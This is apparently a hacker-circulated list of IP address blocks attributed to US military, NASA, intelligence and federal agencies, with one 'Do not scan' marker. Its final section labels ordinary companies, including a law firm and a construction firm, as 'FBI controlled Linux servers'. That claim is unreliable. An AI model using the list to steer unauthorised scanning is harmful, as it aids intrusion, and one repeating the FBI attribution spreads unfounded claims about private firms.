128.161.0.0 NASA Ames Research Center
128.183.0.0 NASA Goddard Space Flight Center
128.190.0.0 Army Belvoir Reasearch and Development Center
128.202.0.0 50th Space Wing
128.216.0.0 MacDill Air Force Base
128.217.0.0 NASA Kennedy Space Center
128.236.0.0 U.S. Air Force Academy

RANGE 129
129.23.0.0 Strategic Defense Initiative Organization
129.29.0.0 United States Military Academy
129.50.0.0 NASA Marshall Space Flight Center
129.51.0.0 Patrick Air Force Base
129.52.0.0 Wright-Patterson Air Force Base
129.53.0.0 - 129.53.255.255 66SPTG-SCB
129.54.0.0 Vandenberg Air Force Base, CA
129.92.0.0 Air Force Institute of Technology
129.99.0.0 NASA Ames Research Center
129.131.0.0 Naval Weapons Center
129.139.0.0 Army Armament Research Development and Engineering Center
129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN
129.163.0.0 NASA/Johnson Space Center
129.164.0.0 NASA IVV
129.165.0.0 NASA Goddard Space Flight Center
129.166.0.0 NASA - John F. Kennedy Space Center
129.167.0.0 NASA Marshall Space Flight Center
129.168.0.0 NASA Lewis Research Center
129.190.0.0 Naval Underwater Systems Center
129.198.0.0 Air Force Flight Test Center
129.209.0.0 Army Ballistics Research Laboratory
129.229.0.0 U.S. Army Corps of Engineers
129.251.0.0 United States Air Force Academy

RANGE 130
130.40.0.0 NASA Johnson Space Center
130.90.0.0 Mather Air Force Base
130.109.0.0 Naval Coastal Systems Center
130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity
130.124.0.0 Honeywell Defense Systems Group
130.165.0.0 U.S.Army Corps of Engineers
130.167.0.0 NASA Headquarters

RANGE 131
131.3.0.0 - 131.3.255.255 Mather Air Force Base
131.6.0.0 Langley Air Force Base
131.10.0.0 Barksdale Air Force Base
131.17.0.0 Sheppard Air Force Base
131.21.0.0 Hahn Air Base
131.22.0.0 Keesler Air Force Base
131.24.0.0 6 Communications Squadron
131.25.0.0 Patrick Air Force Base
131.27.0.0 75 ABW
131.30.0.0 62 CS/SCSNT
131.32.0.0 37 Communications Squadron
131.35.0.0 Fairchild Air Force Base
131.36.0.0 Yokota Air Base
131.37.0.0 Elmendorf Air Force Base
131.38.0.0 Hickam Air Force Base
131.39.0.0 354CS/SCSN
131.40.0.0 Bergstrom Air Force Base
131.44.0.0 Randolph Air Force Base
131.46.0.0 20 Communications Squadron
131.47.0.0 Andersen Air Force Base
131.50.0.0 Davis-Monthan Air Force Base
131.52.0.0 56 Communications Squadron /SCBB
131.54.0.0 Air Force Concentrator Network
131.56.0.0 Upper Heyford Air Force Base
131.58.0.0 Alconbury Royal Air Force Base
131.59.0.0 7 Communications Squadron
131.61.0.0 McConnell Air Force Base
131.62.0.0 Norton Air Force Base
131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO
131.74.0.0 Defense MegaCenter Columbus
131.84.0.0 Defense Technical Information Center
131.92.0.0 Army Information Systems Command - Aberdeen (EA)
131.105.0.0 McClellan Air Force Base
131.110.0.0 NASA/Michoud Assembly Facility
131.120.0.0 Naval Postgraduate School
131.121.0.0 United States Naval Academy
131.122.0.0 United States Naval Academy
131.176.0.0 European Space Operations Center
131.182.0.0 NASA Headquarters
131.250.0.0 Office of the Chief of Naval Research

RANGE 132
132.3.0.0 Williams Air Force Base
132.5.0.0 - 132.5.255.255 49th Fighter Wing
132.6.0.0 Ankara Air Station
132.7.0.0 - 132.7.255.255 SSG/SINO
132.9.0.0 28th Bomb Wing
132.10.0.0 319 Comm Sq
132.11.0.0 Hellenikon Air Base
132.12.0.0 Myrtle Beach Air Force Base
132.13.0.0 Bentwaters Royal Air Force Base
132.14.0.0 Air Force Concentrator Network
132.15.0.0 Kadena Air Base
132.16.0.0 Kunsan Air Base
132.17.0.0 Lindsey Air Station
132.18.0.0 McGuire Air Force Base
132.19.0.0 100CS (NET-MILDENHALL)
132.20.0.0 35th Communications Squadron
132.21.0.0 Plattsburgh Air Force Base
132.22.0.0 23Communications Sq
132.24.0.0 Dover Air Force Base
132.25.0.0 786 CS/SCBM
132.27.0.0 - 132.27.255.255 39CS/SCBBN
132.28.0.0 14TH COMMUNICATION SQUADRON
132.30.0.0 Lajes Air Force Base
132.31.0.0 Loring Air Force Base
132.33.0.0 60CS/SCSNM
132.34.0.0 Cannon Air Force Base
132.35.0.0 Altus Air Force Base
132.37.0.0 75 ABW
132.38.0.0 Goodfellow AFB
132.39.0.0 K.I. Sawyer Air Force Base
132.40.0.0 347 COMMUNICATION SQUADRON
132.42.0.0 Spangdahlem Air Force Base
132.43.0.0 Zweibruchen Air Force Base
132.45.0.0 Chanute Air Force Base
132.46.0.0 Columbus Air Force Base
132.48.0.0 Laughlin Air Force Base
132.49.0.0 366CS/SCSN
132.50.0.0 Reese Air Force Base
132.52.0.0 Vance Air Force Base
132.54.0.0 Langley AFB
132.55.0.0 Torrejon Air Force Base
132.56.0.0 - 132.56.255.255 9 CS/SC
132.57.0.0 Castle Air Force Base
132.58.0.0 Nellis Air Force Base
132.59.0.0 24Comm Squadron\SCSNA
132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON
132.61.0.0 SSG/SIN
132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON
132.79.0.0 Army National Guard Bureau
132.80.0.0 - 132.80.255.255 NGB-AIS-OS
132.80.0.0 - 132.85.255.255 National Guard Bureau
132.82.0.0 Army National Guard Bureau
132.86.0.0 National Guard Bureau
132.87.0.0 - 132.93.255.255 National Guard Bureau
132.94.0.0 Army National Guard Bureau
132.95.0.0 - 132.103.255.255 National Guard Bureau
132.95.0.0 - 132.108.0.0 DOD Network Information Center
132.104.0.0 - 132.104.255.255 Army National Guard Bureau
132.105.0.0 - 132.108.255.255 Army National Guard Bureau
132.109.0.0 National Guard Bureau
132.110.0.0 - 132.116.255.255 Army National Guard Bureau
132.114.0.0 Army National Guard
132.117.0.0 Army National Guard Bureau
132.118.0.0 - 132.132.0.0 Army National Guard Bureau
132.122.0.0 South Carolina Army National Guard, USPFO
132.133.0.0 National Guard Bureau
132.134.0.0 - 132.143.255.255 National Guard Bureau
132.159.0.0 Army Information Systems Command
132.193.0.0 Army Research Office
132.250.0.0 Naval Research Laboratory

RANGE 134
134.5.0.0 Lockheed Aeronautical Systems Company
134.11.0.0 The Pentagon
134.12.0.0 NASA Ames Research Center
134.51.0.0 Boeing Military Aircraft Facility
134.52.*.* Boeing Corporation
134.78.0.0 Army Information Systems Command-ATCOM
134.80.0.0 Army Information Systems Command
134.118.0.0 NASA/Johnson Space Center
134.131.0.0 Wright-Patterson Air Force Base
134.136.0.0 Wright-Patterson Air Force Base
134.164.0.0 Army Engineer Waterways Experiment Station
134.165.0.0 Headquarters Air Force Space Command
134.194.0.0 U.S. Army Aberdeen Test Center
134.205.0.0 7th Communications Group
134.207.0.0 Naval Research Laboratory
134.229.0.0 Navy Regional Data Automation Center
134.230.0.0 Navy Regional Data Automation Center
134.232.0.0 - 134.232.255.255 U.S. Army, Europe
134.233.0.0 HQ 5th Signal Command
134.234.0.0 - 134.234.255.255 Southern European Task Force
134.235.0.0 HQ 5th Signal Command
134.240.0.0 U.S. Military Academy
136.149.0.0 Air Force Military Personnel Center

RANGE 136
136.178.0.0 NASA Research Network
136.188.0.0 - 136.197.255.255 Defense Intelligence Agency
136.207.0.0 69th Signal Battalion
136.208.0.0 HQ, 5th Signal Command
136.209.0.0 HQ 5th Signal Command
136.210.0.0 HQ 5th Signal Command
136.212.0.0 HQ 5th Signal Command
136.213.0.0 HQ, 5th Signal Command
136.214.0.0 HQ, 5th Signal Command
136.215.0.0 HQ, 5th Signal Command
136.216.0.0 HQ, 5th Signal Command
136.217.0.0 HQ, 5th Signal Command
136.218.0.0 HQ, 5th Signal Command
136.219.0.0 HQ, 5th Signal Command
136.220.0.0 HQ, 5th Signal Command
136.221.0.0 HQ, 5th Signal Command
136.222.0.0 HQ, 5th Signal Command

RANGE 137
137.1.0.0 Whiteman Air Force Base
137.2.0.0 George Air Force Base
137.3.0.0 Little Rock Air Force Base
137.4.0.0 - 137.4.255.255 437 CS/SC
137.5.0.0 Air Force Concentrator Network
137.6.0.0 Air Force Concentrator Network
137.11.0.0 HQ AFSPC/SCNNC
137.12.0.0 Air Force Concentrator Network
137.17.* National Aerospace Laboratory
137.24.0.0 Naval Surface Warfare Center
137.29.0.0 First Special Operations Command
137.67.0.0 Naval Warfare Assessment Center
137.94.* Royal Military College
137.95.* Headquarters, U.S. European Command
137.126.0.0 USAF MARS
137.127.* Army Concepts Analysis Agency
137.128.* U.S. ARMY Tank-Automotive Command
137.130.0.0 Defense Information Systems Agency
137.209.0.0 Defense Information Systems Agency
137.210.0.0 Defense Information Systems Agency
137.211.0.0 Defense Information Systems Agency
137.212.0.0 Defense Information Systems Agency
137.231.0.0 HQ 5th Signal Command
137.232.0.0 Defense Information Systems Agency
137.233.0.0 Defense Information Systems Agency
137.234.0.0 Defense Information Systems Agency
137.235.0.0 Defense Information Systems Agency
137.240.0.0 Air Force Materiel Command
137.241.0.0 75 ABW
137.242.0.0 Air Force Logistics Command
137.243.0.0 77 CS/SCCN
137.244.0.0 78 CS/SCSC
137.245.0.0 Wright Patterson Air Force Base
137.246.0.0 United States Atlantic Command Joint Training

RANGE 138
138.13.0.0 Air Force Systems Command
138.27.0.0 Army Information Systems Command
138.50.0.0 HQ 5th Signal Command
138.65.0.0 HQ, 5th Signal Command
138.76.0.0 NASA Headquarters
138.109.0.0 Naval Surface Warfare Center
138.115.0.0 NASA Information and Electronic Systems Laboratory
138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR
138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications Station
138.137.0.0 Navy Regional Data Automation Center (NARDAC)
138.139.0.0 Marine Corps Air Station
138.140.0.0 Navy Regional Data Automation Center
138.141.0.0 Navy Regional Data Automation Center
138.142.0.0 Navy Regional Data Automation Center
138.143.0.0 Navy Regional Data Automation Center
138.144.0.0 NAVCOMTELCOM
138.145.0.0 NCTS WASHINGTON
138.146.0.0 NCTC
138.147.0.0 NCTC
138.148.0.0 NCTC
138.149.0.0 NCTC
138.150.0.0 NCTC
138.151.0.0 NCTC
138.152.0.0 NCTC
138.153.0.0 Yokosuka Naval Base
138.154.0.0 NCTC
138.155.0.0 NCTC
138.156.0.0 Marine Corps Central Design & Prog. Activity
138.157.0.0 - 138.157.255.255 Marine Corps Central Design & Prog. Activity
138.158.0.0 Marine Corps Central Design & Prog. Activity
138.159.0.0 NCTC
138.160.0.0 Naval Air Station
138.161.0.0 NCTC
138.162.0.0 NCTC
138.163.0.0 NCTC
138.164.0.0 NCTC
138.165.0.0 NCTC
138.166.0.0 NCTC
138.167.0.0 NOC, MCTSSA, East
138.168.0.0 Marine Corps Central Design & Prog. Activity
138.169.0.0 NAVAL COMPUTER AND TELECOMM
138.169.12.0 NAVAL COMPUTER AND TELECOMM
138.169.13.0 NAVAL COMPUTER AND TELECOMM
138.170.0.0 NCTC
138.171.0.0 NCTC
138.172.0.0 NCTC
138.173.0.0 NCTC
138.174.0.0 NCTC
138.175.0.0 NCTC
138.176.0.0 NCTC
138.177.0.0 NCTS Pensacola
138.178.0.0 NCTC
138.179.0.0 NCTC
138.180.0.0 NCTC
138.181.0.0 NCTC
138.182.0.0 CNO N60
138.183.0.0 NCTC
138.184.0.0 NCTS
138.193.0.0 NASA/Yellow Creek

RANGE 139
139.31.0.0 20th Tactical Fighter Wing
139.32.0.0 48th Tactical Fighter Wing
139.33.0.0 36th Tactical Fighter Wing
139.34.0.0 52nd Tactical Fighter Wing
139.35.0.0 50th Tactical Fighter Wing
139.36.0.0 66th Electronic Combat Wing
139.37.0.0 26th Tactical Reconnaissance Wing
139.38.0.0 32nd Tactical Fighter Squadron
139.39.0.0 81st Tactical Fighter Wing
139.40.0.0 10th Tactical Fighter Wing
139.41.0.0 39th Tactical Air Control Group
139.42.0.0 40th Tactical Air Control Group
139.43.0.0 401st Tactical Fighter Wing
139.124.* Reseau Infomratique
139.142.*.*

RANGE 140
140.1.0.0 Defense Information Systems Agency
140.3.0.0 Defense Information Systems Agency
140.4.0.0 Defense Information Systems Agency
140.5.0.0 Defense Information Systems Agency
140.6.0.0 Defense Information Systems Agency
140.7.0.0 Defense Information Systems Agency
140.8.0.0 Defense Information Systems Agency
140.9.0.0 Defense Information Systems Agency
140.10.0.0 Defense Information Systems Agency
140.11.0.0 Defense Information Systems Agency
140.12.0.0 Defense Information Systems Agency
140.13.0.0 Defense Information Systems Agency
140.14.0.0 DISA Columbus Level II NOC
140.15.0.0 Defense Information Systems Agency
140.16.0.0 Defense Information Systems Agency
140.17.0.0 Defense Information Systems Agency
140.18.0.0 Defense Information Systems Agency
140.19.0.0 Defense Information Systems Agency
140.20.0.0 Defense Information Systems Agency
140.21.0.0 Defense Information Systems Agency
140.22.0.0 Defense Information Systems Agency
140.23.0.0 Defense Information Systems Agency
140.24.0.0 ASIC ALLIANCE-MARLBORO
140.25.0.0 Defense Information Systems Agency
140.26.0.0 Defense Information Systems Agency
140.27.0.0 Defense Information Systems Agency
140.28.0.0 Defense Information Systems Agency
140.29.0.0 Defense Information Systems Agency
140.30.0.0 Defense Information Systems Agency
140.31.0.0 Defense Information Systems Agency
140.32.0.0 Defense Information Systems Agency
140.33.0.0 Defense Information Systems Agency
140.34.0.0 Defense Information Systems Agency
140.35.0.0 Defense Information Systems Agency
140.36.0.0 Defense Information Systems Agency
140.37.0.0 Defense Information Systems Agency
140.38.0.0 Defense Information Systems Agency
140.39.0.0 Defense Information Systems Agency
140.40.0.0 Defense Information Systems Agency
140.41.0.0 Defense Information Systems Agency
140.42.0.0 Defense Information Systems Agency
140.43.0.0 Defense Information Systems Agency
140.44.0.0 Defense Information Systems Agency
140.45.0.0 Defense Information Systems Agency
140.46.0.0 Defense Information Systems Agency
140.47.0.0 - 140.47.255.255 Defense Information Systems Agency
140.47.0.0 - 140.48.255.255 DOD Network Information Center
140.48.0.0 - 140.48.255.255 Defense Information Systems Agency
140.49.0.0 Defense Information Systems Agency
140.50.0.0 Defense Information Systems Agency
140.51.0.0 Defense Information Systems Agency
140.52.0.0 Defense Information Systems Agency
140.53.0.0 Defense Information Systems Agency
140.54.0.0 Defense Information Systems Agency
140.55.0.0 Defense Information Systems Agency
140.56.0.0 Defense Information Systems Agency
140.57.0.0 Defense Information Systems Agency
140.58.0.0 Defense Information Systems Agency
140.59.0.0 Defense Information Systems Agency
140.60.0.0 Defense Information Systems Agency
140.61.0.0 Defense Information Systems Agency
140.62.0.0 Defense Information Systems Agency
140.63.0.0 Defense Information Systems Agency
140.64.0.0 Defense Information Systems Agency
140.65.0.0 Defense Information Systems Agency
140.66.0.0 Defense Information Systems Agency
140.67.0.0 Defense Information Systems Agency
140.68.0.0 Defense Information Systems Agency
140.69.0.0 Defense Information Systems Agency
140.70.0.0 Defense Information Systems Agency
140.71.0.0 Defense Information Systems Agency
140.72.0.0 Defense Information Systems Agency
140.73.0.0 Defense Information Systems Agency
140.74.0.0 - 140.74.255.255 Defense Information Systems Agency
140.100.0.0 Naval Sea Systems Command
140.139.0.0 HQ US Army Medical Research and Development Command
140.154.0.0 HQ 5th Signal Command
140.155.0.0 HQ, 5th Signal Command
140.156.0.0 HQ, 5th Signal Command
140.175.0.0 Scott Air Force Base
140.178.0.0 Naval Undersea Warfare Center Division, Keyport
140.187.0.0 Fort Bragg
140.194.0.0 US Army Corps of Engineers
140.195.0.0 Naval Sea Systems Command
140.199.0.0 Naval Ocean Systems Center
140.201.0.0 HQ, 5th Signal Command
140.202.0.0 106TH SIGNAL BRIGADE

RANGE 143
143.45.0.0 58th Signal Battalion
143.46.0.0 U.S. Army, 1141st Signal Battalion
143.68.0.0 Headquarters, USAISC
143.69.0.0 Headquarters, USAAISC
143.70.0.0 Headquarters, USAAISC
143.71.0.0 Headquarters, USAAISC
143.72.0.0 Headquarters, USAAISC
143.73.0.0 Headquarters, USAAISC
143.74.0.0 Headquarters, USAAISC
143.75.0.0 Headquarters, USAAISC
143.76.0.0 Headquarters, USAAISC
143.77.0.0 Headquarters, USAAISC
143.78.0.0 Headquarters, USAAISC
143.79.0.0 Headquarters, USAAISC
143.80.0.0 Headquarters, USAAISC
143.81.0.0 Headquarters, USAAISC
143.82.0.0 Headquarters, USAAISC
143.84.0.0 Headquarters, USAAISC
143.85.0.0 Headquarters, USAAISC
143.86.0.0 Headquarters, USAAISC
143.87.0.0 Headquarters, USAAISC
143.232.0.0 NASA Ames Research Center

RANGE 144
144.99.0.0 United States Army Information Systems Command
144.109.0.0 Army Information Systems Command
144.143.0.0 Headquarters, Third United States Army
144.144.0.0 Headquarters, Third United States Army
144.146.0.0 Commander, Army Information Systems Center
144.147.0.0 Commander, Army Information Systems Center
144.170.0.0 HQ, 5th Signal Command
144.192.0.0 United States Army Information Services Command-Campbell
144.233.0.0 Defense Intelligence Agency
144.234.0.0 Defense Intelligence Agency
144.235.0.0 Defense Intelligence Agency
144.236.0.0 Defense Intelligence Agency
144.237.0.0 Defense Intelligence Agency
144.238.0.0 Defense Intelligence Agency
144.239.0.0 Defense Intelligence Agency
144.240.0.0 Defense Intelligence Agency
144.241.0.0 Defense Intelligence Agency
144.242.0.0 Defense Intelligence Agency
144.252.0.0 U.S. Army LABCOM

RANGE 146
146.17.0.0 HQ, 5th Signal Command
146.80.0.0 Defence Research Agency
146.98.0.0 HQ United States European Command
146.154.0.0 NASA/Johnson Space Center
146.165.0.0 NASA Langley Research Center

RANGE 147
147.35.0.0 HQ, 5th Signal Command
147.36.0.0 HQ, 5th Signal Command
147.37.0.0 HQ, 5th Signal Command
147.38.0.0 HQ, 5th Signal Command
147.39.0.0 HQ, 5th Signal Command
147.40.0.0 HQ, 5th Signal Command
147.42.0.0 Army CALS Project
147.103.0.0 Army Information Systems Software Center
147.104.0.0 Army Information Systems Software Center
147.159.0.0 Naval Air Warfare Center, Aircraft Division
147.168.0.0 Naval Surface Warfare Center
147.169.0.0 HQ, 5th Signal Command
147.198.0.0 Army Information Systems Command
147.199.0.0 Army Information Systems Command
147.238.0.0 Army Information Systems Command
147.239.0.0 1112th Signal Battalion
147.240.0.0 US Army Tank-Automotive Command
147.242.0.0 19th Support Command
147.248.0.0 Fort Monroe DOIM
147.254.0.0 7th Communications Group

RANGE 148
148.114.0.0 NASA, Stennis Space Center

RANGE 150
150.113.0.0 1114th Signal Battalion
150.114.0.0 1114th Signal Battalion
150.125.0.0 Space and Naval Warfare Command
150.133.0.0 10th Area Support Group
150.144.0.0 NASA Goodard Space Flight Center
150.149.0.0 Army Information Systems Command
150.157.0.0 USAISC-Fort Lee
150.184.0.0 Fort Monroe DOIM
150.190.0.0 USAISC-Letterkenny
150.196.0.0 USAISC-LABCOM

RANGE 152
152.82.0.0 7th Communications Group of the Air Force
152.151.0.0 U.S. Naval Space & Naval Warfare Systems Command
152.152.0.0 NATO Headquarters
152.154.0.0 Defense Information Systems Agency
152.229.0.0 Defense MegaCenter (DMC) Denver

RANGE 153
153.21.0.0 USCENTAF/SCM
153.22.0.0 USCENTAF/SCM
153.23.0.0 USCENTAF/SCM
153.24.0.0 USCENTAF/SCM
153.25.0.0 USCENTAF/SCM
153.26.0.0 USCENTAF/SCM
153.27.0.0 USCENTAF/SCM
153.28.0.0 USCENTAF/SCM
153.29.0.0 USCENTAF/SCM
153.30.0.0 USCENTAF/SCM
153.31.0.0 Federal Bureau of Investigation

RANGE 155
155.5.0.0 1141st Signal Bn
155.6.0.0 1141st Signal Bn
155.7.0.0 American Forces Information
155.8.0.0 U.S. ArmyFort Gordon
155.9.0.0 - 155.9.255.255 United States Army Information Systems Command
155.74.0.0 PEO STAMIS
155.75.0.0 US Army Corps of Engineers
155.76.0.0 PEO STAMIS
155.77.0.0 PEO STAMIS
155.78.0.0 PEO STAMIS
155.79.0.0 US Army Corps of Engineers
155.80.0.0 PEO STAMIS
155.81.0.0 PEO STAMIS
155.82.0.0 PEO STAMIS
155.83.0.0 US Army Corps of Enginers
155.84.0.0 PEO STAMIS
155.85.0.0 PEO STAMIS
155.86.0.0 US Army Corps of Engineers
155.87.0.0 PEO STAMIS
155.88.0.0 PEO STAMIS
155.96.0.0 Drug Enforcement Administration
155.149.0.0 1112th Signal Battalion
155.155.0.0 HQ, 5th Signal Command
155.178.0.0 Federal Aviation Administration
155.213.0.0 USAISC Fort Benning
155.214.0.0 Director of Information Management
155.215.0.0 USAISC-FT DRUM
155.216.0.0 TCACCIS Project Management Office
155.217.0.0 Directorate of Information Management
155.218.0.0 USAISC
155.219.0.0 DOIM/USAISC Fort Sill
155.220.0.0 USAISC-DOIM
155.221.0.0 USAISC-Ft Ord

RANGE 156
156.9.0.0 U. S. Marshals Service

RANGE 157
157.150.0.0 United Nations
157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET
157.202.0.0 US Special Operations Command
157.217.0.0 U. S. Strategic Command

RANGE 158
158.1.0.0 Commander, Tooele Army Depot
158.2.0.0 USAMC Logistics Support Activity
158.3.0.0 U.S. Army TACOM
158.4.0.0 UASISC Ft. Carson
158.5.0.0 1112th Signal Battalion
158.6.0.0 USAISC-Ft. McCoy
158.7.0.0 USAISC-FLW
158.8.0.0 US Army Soldier Support Center
158.9.0.0 USAISC-CECOM
158.10.0.0 GOC
158.11.0.0 UASISC-Vint Hill
158.12.0.0 US Army Harry Diamond Laboratories
158.13.0.0 USAISC DOIM
158.14.0.0 1112th Signal Battalion
158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville
158.16.0.0 Rocky Mountain Arsenal (PMRMA)
158.17.0.0 Crane Army Ammunition Activity
158.18.0.0 Defense Finance & Accounting Service Center
158.19.0.0 DOIM
158.20.0.0 DOIM
158.235.0.0 Marine Corps Central Design and Programming Activity
158.243.0.0 Marine Corps Central Design and Programming Activity
158.244.0.0 Marine Corps Central Design and Programming Activity
158.245.0.0 Marine Corps Central Design and Programming Activity
158.246.0.0 Marine Corps Central Design and Programming Activity

RANGE 159
159.120.0.0 Naval Air Systems Command (Air 4114)

RANGE 160
160.132.0.0 US Army Recruiting Command
160.135.0.0 36th Signal BN
160.138.0.0 USAISC
160.139.0.0 USAISC
160.140.0.0 HQ, United States Army
160.143.0.0 USAISC
160.145.0.0 1101st Signal Brigade
160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS
160.150.0.0 Commander, Moncrief Army Hospital

RANGE 161
161.124.0.0 NAVAL WEAPONS STATION

RANGE 162
162.32.0.0 Naval Aviation Depot Pensacola
162.45.0.0 Central Intelligence Agency
162.46.0.0 Central Intelligence Agency

RANGE 163
163.205.0.0 NASA Kennedy Space Center
163.206.0.0 NASA Kennedy Space Center

RANGE 164
164.45.0.0 Naval Ordnance Center, Pacific Division
164.49.0.0 United States Army Space and Strategic Defense
164.158.0.0 Naval Surface Warfare Center
164.217.0.0 Institute for Defense Analyses
164.218.0.0 Bureau of Naval Personnel
164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER
164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET
164.221.0.0 - 164.221.255.255 Information Technology
164.223.0.0 Naval Undersea Warfare Center
164.224.0.0 Secretary of the Navy
164.225.0.0 U.S. Army Intelligence and Security Command
164.226.0.0 Naval Exchange Service Command
164.227.0.0 Naval Surface Warfare Center, Crane Division
164.228.0.0 USCINCPAC J21T
164.229.0.0 NCTS-NOLA
164.230.0.0 Naval Aviation Depot
164.231.0.0 Military Sealift Command
164.232.0.0 - 164.232.255.255 United States Southern Command

RANGE 167
167.44.0.0 Government Telecommunications Agency

RANGE 168
168.68.0.0 USDA Office of Operations
168.85.0.0 Fort Sanders Alliance
168.102.0.0 Indiana Purdue Fort Wayne

RANGE 169
169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 194

RANGE 195
195.10.* Various - Do not scan

RANGE 199
199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA

RANGE 203
203.59.0.0 - 203.59.255.255 Perth Australia iiNET

RANGE 204
204.34.0.0 - 204.34.15.0 IPC JAPAN
204.34.0.0 - 204.37.255.0 DOD Network Information Center
204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery
204.34.32.0 - 204.34.63.0 USACOM
204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE
204.34.128.0 DISA-Eucom / BBN-STD, Inc.
204.34.129.0 Defense Technical Information Center
204.34.130.0 GSI
204.34.131.0 NSA NAPLES ITALY
204.34.132.0 NAVSTA ROTA SPAIN
204.34.133.0 NAS SIGONELLA ITALY
204.34.134.0 Naval Air Warfare Center Aircraft Division
204.34.135.0 GSI
204.34.136.0 Naval Undersea Warfare Center USRD - Orlando
204.34.137.0 Joint Spectrum Center
204.34.138.0 GSI
204.34.139.0 HQ, JFMO Korea, Headquarters
204.34.140.0 DISA D75
204.34.141.0 U. S. Naval Air Facility, Atsugi Japan
204.34.142.0 Naval Enlisted Personnel Management Center
204.34.143.0 Afloat Training Group Pacific
204.34.144.0 HQ Special Operations Command - Europe
204.34.145.0 Commander Naval Base Pearl Harbor
204.34.147.0 NAVSEA Information Management Improvement Program
204.34.148.0 Q112
204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures
204.34.150.0 Resource Consultants, Inc.
204.34.151.0 Personnel Support Activity, San Diego
204.34.152.0 NAVAL AIR FACILITY, ADAK
204.34.153.0 NAVSEA Logistics Command Detachment
204.34.154.0 PEARL HARBOR NAVAL SHIPYARD
204.34.155.0 PEARL HARBOR NAVAL SHIPYARD
204.34.156.0 Defense Photography School
204.34.157.0 - 204.34.160.0 Defense Information School
204.34.161.0 Naval Air Systems Command
204.34.162.0 Puget Sound Naval Shipyard
204.34.163.0 Joint Precision Strike Demonstration
204.34.164.0 Naval Pacific Meteorology and Ocean
204.34.165.0 Joint Precision Strike Demonstration
204.34.167.0 USAF
204.34.168.0 Commander
204.34.169.0 Naval Air Warfare Center
204.34.170.0 Naval Air Systems Command
204.34.171.0 NAVSTA SUPPLY DEPARTMENT
204.34.173.0 SUBMEPP Activity
204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN
204.34.176.0 DISA-PAC,IPC-GUAM
204.34.177.0 Satellite Production Test Center
204.34.181.0 940 Air Refueling Wing
204.34.182.0 Defense Megacenter Warner Robins
204.34.183.0 GCCS Support Facility
204.34.184.0 Nav Air Tech Serv Facility-Detachment
204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA
204.34.186.0 Defense Logistics Agency - Europe
204.34.187.0 NAVMASSO
204.34.188.0 Commander-In-Chief, US Pacific Fleet
204.34.189.0 Defense MegaCenter - St Louis
204.34.190.0 NAVMASSO
204.34.192.0 HQ SOCEUR
204.34.193.0 Second Marine Expeditionary Force
204.34.194.0 Second Marine Expeditionary Force
204.34.195.0 Second Marine Expeditionary Force
204.34.196.0 NAVCOMTELSTAWASHDC
204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.198.0 Naval Observatory Detachment, Colorado
204.34.199.0 NAVILCODETMECH
204.34.200.0 Navy Environmental Preventive Medicine
204.34.201.0 Port Hueneme Division, Naval Surf
204.34.202.0 Naval Facilities Engineering Housing
204.34.203.0 NAVSEA Logistics Command Detachment
204.34.204.0 Naval Air Warfare Center
204.34.205.0 Portsmouth Naval Shipyard
204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific
204.34.211.0 USAF Academy
204.34.212.0 3rd Combat Service Support
204.34.213.0 1st Radio Battalion
204.34.214.0 OASD (Health Affairs)
204.34.215.0 Second Marine Expeditionary Force
204.34.216.0 1st Marine Air Wing
204.34.217.0 SA-ALC/LTE
204.34.218.0 3rd Marine
204.34.219.0 Communications and Electronics
204.34.220.0 G-6 Operations
204.34.221.0 G-6 Operations
204.34.222.0 G-6 Operations
204.34.223.0 G-6 Operations
204.34.224.0 G-6 Operations
204.34.225.0 Joint Interoperability Test Command
204.34.226.0 NAVMASSO
204.34.227.0 NAVMASSO
204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency
204.34.229.0 Naval Space Command
204.34.230.0 Naval Pacific Meteorology and Oceanography
204.34.232.0 Military Family Housing
204.34.233.0 - 204.34.233.255 Navy Material Transportation Office
204.34.234.0 NAVMASSO
204.34.235.0 Defense Finance and Accounting Service
204.34.237.0 European Stars and Stripes
204.34.238.0 Pacific Stars and Stripes
204.34.239.0 PUGET SOUND NAVAL SHIPYARD
204.34.240.0 Nval Station, Guantanamo Bay
204.34.242.0 COMNAVSURFPAC
204.34.243.0 NAVMASSO
204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy
204.34.245.0 USAF SpaceCommand
204.34.246.0 USAF
204.34.247.0 U.S. Army Special Operations Command
204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA
204.34.249.0 Naval Aviation Depot North Island
204.34.250.0 NAVMASSO
204.34.251.0 NAVSEA Log Command Detachment Pacific
204.34.252.0 Command Special Boat Squadron One
204.34.253.0 AFPCA/GNNN
204.34.254.0 Navy Environmental Preventive Medicine

RANGE 205
205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
205.96.* - 205.103.*

RANGE 207
207.30.* Sprint/United Telephone of Florida

All the below are FBI controlled Linux servers & IPs/IP-Ranges

207.60.0.0 - 207.60.255.0 The Internet Access Company
207.60.2.128 - 207.60.2.255 Abacus Technology
207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.
207.60.3.128 - 207.60.3.255 Peabody Proberties Inc
207.60.4.0 - 207.60.4.127 Northern Electronics
207.60.4.128 - 207.60.4.255 Posternak, Blankstein & Lund
